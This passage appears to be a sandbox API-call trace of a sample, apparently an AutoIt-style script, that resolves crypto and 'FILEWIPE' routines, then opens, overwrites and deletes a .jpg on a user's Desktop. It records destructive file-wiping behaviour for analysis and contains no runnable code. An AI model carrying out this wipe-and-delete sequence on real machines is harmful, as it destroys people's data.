(HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0030.095] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0030.095] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0030.095] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0030.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0030.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0030.095] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.095] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0030.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0030.095] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.095] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0030.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.095] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.095] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0030.095] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.095] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0030.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.095] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.095] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0030.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0030.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0030.096] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0030.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0030.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0030.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.096] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.096] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0030.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0030.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0030.096] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.096] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0030.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0030.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0030.096] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0030.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0030.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0030.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0030.097] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0030.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0030.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0030.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8898c8 [0030.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0030.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0030.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0030.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0030.097] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0030.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0030.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0030.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0030.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.098] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.098] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0030.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0030.098] FreeLibrary (hLibModule=0x754b0000) returned 1 [0030.098] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.099] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.099] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0030.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0030.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0030.099] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0030.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0030.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0030.099] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0030.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0030.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0030.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.099] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0030.099] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0030.099] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0030.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0030.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0030.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0030.100] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0030.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0030.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0030.100] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f2c09f0, ftCreationTime.dwHighDateTime=0x1d5c2aa, ftLastAccessTime.dwLowDateTime=0x22fc7280, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x22fc7280, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x1245, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Nhz507zeCNmw5OeL.jpg", cAlternateFileName="NHZ507~1.JPG")) returned 0x7c2240 [0030.100] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0030.100] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0030.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0030.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0030.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0030.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0030.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0030.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0030.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0030.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0030.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0030.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0030.101] CharLowerBuffW (in: lpsz="byte[4677]", cchLength=0xa | out: lpsz="byte[4677]") returned 0xa [0030.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac350 [0030.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0030.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0030.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0030.101] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.101] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0030.101] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.101] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0030.101] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0030.101] FreeLibrary (hLibModule=0x76b40000) returned 1 [0030.101] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.101] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.101] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.101] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0030.101] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.101] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.101] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.101] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.101] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.101] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.102] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.102] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.102] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.102] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.102] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.102] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.102] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.102] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.102] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.102] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.102] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0030.102] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.102] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nhz507zecnmw5oel.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0030.102] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.102] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.103] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.103] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.103] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0030.103] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.103] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.103] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.103] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.103] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.103] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.103] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.103] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.103] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0030.103] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.103] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.103] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.104] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.104] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.104] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.104] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.104] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg", lpFilePart=0x0) returned 0x3a [0030.104] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f2c09f0, ftCreationTime.dwHighDateTime=0x1d5c2aa, ftLastAccessTime.dwLowDateTime=0x22fc7280, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x11d45c60, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1245, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="Nhz507zeCNmw5OeL.jpg", cAlternateFileName="NHZ507~1.JPG")) returned 0x7c2240 [0030.104] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nhz507zecnmw5oel.jpg")) returned 1 [0030.105] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f2c09f0, ftCreationTime.dwHighDateTime=0x1d5c2aa, ftLastAccessTime.dwLowDateTime=0x22fc7280, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x11d45c60, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1245, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="Nhz507zeCNmw5OeL.jpg", cAlternateFileName="NHZ507~1.JPG")) returned 0 [0030.105] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0030.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0030.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0030.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0030.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0030.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0030.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0030.106] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0030.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0030.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0030.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0030.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0030.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0030.106] 